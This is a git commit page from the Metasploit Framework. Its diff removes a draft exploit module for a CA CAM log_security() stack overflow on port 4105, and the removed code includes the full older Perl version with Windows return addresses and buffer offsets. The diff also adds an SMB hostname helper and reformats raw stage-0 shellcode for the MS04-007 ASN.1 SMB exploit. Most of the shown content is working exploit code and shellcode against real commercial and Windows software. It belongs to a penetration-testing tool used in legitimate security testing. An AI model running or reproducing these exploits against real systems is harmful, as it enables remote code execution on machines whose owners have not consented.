mnor
git-svn-id: file:///home/svn/incoming/trunk@3159 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
parent
ebf9cf5c48
commit
4d43e8f482
|
|
@ -1,179 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CA CAM log_security() Stack Overflow (Win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the CA CAM service
|
||||
by passing a long parameter to the log_security() function.
|
||||
The CAM service is part of TNG Unicenter. This module has
|
||||
been tested on Unicenter v3.1.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, winnt, win2000, winxp, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::cacam_logsecurity_win32;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'CA CAM log_security() Stack Overflow (Win32)',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
|
||||
'Priv' => 1,
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 4105],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a vulnerability in the CA CAM service by passing
|
||||
a long parameter to the log_security() function. The CAM service is part
|
||||
of TNG Unicenter. This module has been tested on Unicenter v3.1.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' =>
|
||||
[
|
||||
# W2API.DLL @ 0x01950000 - return to ESI
|
||||
# $Header$
|
||||
['W2API.DLL TNG 2.3', 0x01951107],
|
||||
|
||||
# return to ESI in ws2help.dll
|
||||
['Windows 2000 SP0-SP4 English', 0x750217ae],
|
||||
['Windows XP SP0-SP1 English', 0x71aa16e5],
|
||||
['Windows XP SP2 English', 0x71aa1b22],
|
||||
['Windows 2003 SP0 English', 0x71bf175f],
|
||||
],
|
||||
|
||||
'Keys' => ['cam'],
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $pattern = Pex::Text::EnglishText(4096);
|
||||
|
||||
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
||||
substr($pattern, 1016, 4, pack('V', $target->[1]));
|
||||
substr($pattern, 1052, length($shellcode), $shellcode);
|
||||
|
||||
my $req =
|
||||
"\xfa\xf9\x00\x10" . $pattern . "\x00";
|
||||
|
||||
my $ack = $s->Recv(4, 5);
|
||||
if ($ack ne "ACK\x00") {
|
||||
$self->PrintLine("[*] The CAM service is not responding.");
|
||||
return;
|
||||
}
|
||||
$s->Send($req);
|
||||
$s->Recv(-1,1);
|
||||
$self->Handler($s);
|
||||
$s->Close();
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -197,6 +197,10 @@ module Exploit::Remote::SMB
|
|||
return data
|
||||
end
|
||||
|
||||
def smb_hostname
|
||||
datastore['SMBNAME'] || '*SMBSERVER'
|
||||
end
|
||||
|
||||
attr_accessor :simple
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -78,29 +78,30 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
|
|||
def exploit
|
||||
|
||||
# The first stage shellcode fixes the PEB pointer and cleans the heap
|
||||
stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
|
||||
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
|
||||
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
|
||||
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
|
||||
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
|
||||
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
|
||||
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
|
||||
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
|
||||
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
|
||||
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
|
||||
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
|
||||
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
|
||||
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
|
||||
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
|
||||
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
|
||||
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
|
||||
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
|
||||
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
|
||||
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
|
||||
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
|
||||
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
|
||||
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
|
||||
"\x08\x00\xeb\xfe"
|
||||
stage0 =
|
||||
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
|
||||
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
|
||||
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
|
||||
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
|
||||
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
|
||||
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
|
||||
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
|
||||
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
|
||||
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
|
||||
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
|
||||
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
|
||||
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
|
||||
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
|
||||
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
|
||||
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
|
||||
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
|
||||
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
|
||||
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
|
||||
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
|
||||
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
|
||||
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
|
||||
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
|
||||
"\x08\x00\xeb\xfe"
|
||||
|
||||
token = spnego_token(stage0, payload.encoded)
|
||||
|
||||
|
|
@ -121,7 +122,7 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
|
|||
client = Rex::Proto::SMB::Client.new(sock)
|
||||
|
||||
begin
|
||||
client.session_request(name) if not datastore['SMBDirect']
|
||||
client.session_request(smb_hostname()) if not datastore['SMBDirect']
|
||||
client.negotiate
|
||||
client.session_setup_ntlmv2_blob(token)
|
||||
rescue => e
|
||||
|
|
|
|||
Loading…
Reference in New Issue